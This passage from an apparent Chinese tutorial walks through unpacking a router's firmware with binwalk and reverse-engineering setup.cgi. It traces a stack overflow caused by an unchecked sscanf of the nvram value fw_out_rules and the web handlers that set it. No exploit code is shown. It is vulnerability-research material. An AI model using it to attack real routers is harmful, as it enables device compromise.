<p>binwalk作者为Ubuntu系统定制了依赖的安装脚本,直接执行deps.sh,免去大部分烦恼!</p>
|
|||
|
|
</blockquote>
|
|||
|
|
<pre blockindex=5><code class="hljs language-php">git <span class=hljs-keyword>clone</span> https:<span class=hljs-comment>//github.com/ReFirmLabs/binwalk</span>
|
|||
|
|
cd binwalk
|
|||
|
|
sudo python3 setup.py install
|
|||
|
|
sudo ./deps.sh
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=6>在开始漏洞挖掘之前,我们需要下载并解包路由器的固件。本文以某厂商路由器为例,首先从<a href=https://www.netgear.com/support/product/R6260.aspx>官网</a>下载固件,然后使用binwalk进行解包:</p>
|
|||
|
|
<pre blockindex=7><code class="hljs language-php">binwalk -Me <firmware_file>
|
|||
|
|
</code></pre>
|
|||
|
|
<h3 blockindex=8>漏洞分析</h3>
|
|||
|
|
<h4 blockindex=9>目标漏洞信息</h4>
|
|||
|
|
<p blockindex=10>目标路由器属于MIPSEL架构,漏洞二进制位于setup.cgi(许多路由器的漏洞都位于CGI中,所以可以多看看,而且也比较容易利用)</p>
|
|||
|
|
<pre blockindex=11><code class="hljs language-bash">file setup.cgi
|
|||
|
|
setup.cgi: ELF 32-bit LSB shared object, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=12>main函数在<code>setup_main</code></p>
|
|||
|
|
<h4 blockindex=13>逆向</h4>
|
|||
|
|
<p blockindex=14><code>sub_555BA950</code>从nvram中获取了环境变量<code>fw_out_rules</code>的值,没有进行长度检查,在<code>sscanf</code>格式化写入到<code>v16</code>导致栈溢出。</p>
|
|||
|
|
<p blockindex=15><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=16>通过交叉引用<code>fw_out_rules</code>可以发现该环境变量在<code>sub_55567D8C</code>被设置。</p>
|
|||
|
|
<p blockindex=17><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=18>交叉引用上面所说的两个函数 可以发现都是通过<code>ActionTab</code>方式按名调用,分别是<code>rule_list_simple_out</code>和<code>outmove</code>可以在固件解包的目录下<code>grep</code>搜索对应的字符串找到对应的外部接口,下面结合前端后端进行分析。</p>
|
|||
|
|
<p blockindex=19><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=20>直接访问<code>fw_rules.htm</code>,搞几个规则,使用 <code>nvram show | grep fw_out_rules</code> 可以看到这个变量储存的是Service name还有一些数字啥的。</p>
|
|||
|
|
<p blockindex=21><img src="data:image/png;base64,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